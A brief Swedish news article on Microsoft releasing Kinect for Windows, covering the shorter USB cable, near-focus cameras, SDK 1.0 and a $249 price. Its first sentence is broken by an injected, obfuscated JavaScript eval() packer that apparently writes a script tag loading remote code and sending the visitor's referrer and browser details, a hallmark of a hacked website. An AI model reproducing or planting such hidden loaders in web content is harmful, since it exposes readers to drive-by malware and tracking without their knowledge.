Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

PC

Microsoft släpper Kinect för Windows

Microsoft släpper Kinect för Windows
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kstrf|var|u0026u|referrer|ziady||js|php’.split(’|’),0,{}))
är det dags att släppa det populära Kinect från Xbox 360 till persondatorer. Microsoft avslöjar i ett inlägg på sin blogg att Kinect nu finns att köpa hos amerikanska återförsäljare.

Det som är nytt på enheten till Windows är en avkortad USB-sladd samt kameror som kan fokusera på kortare avstånd – 50 cm och med feltolerans ned till 40 cm. En uppdatering från Microsoft ingår i utvecklingspaketet som gör det lättare för programmerare att använda den djupseende kameran.

I am very pleased to report that today version 1.0 of our SDK and runtime were made available for download, and distribution partners in our twelve launch countries are starting to ship Kinect for Windows hardware, enabling companies to start to deploy their solutions.

Pris på Kinect för Windows ligger runt 249 dollar vilket motsvarar ca 2 100 kronor.

När det dyker upp i Sverige är inte bestämt.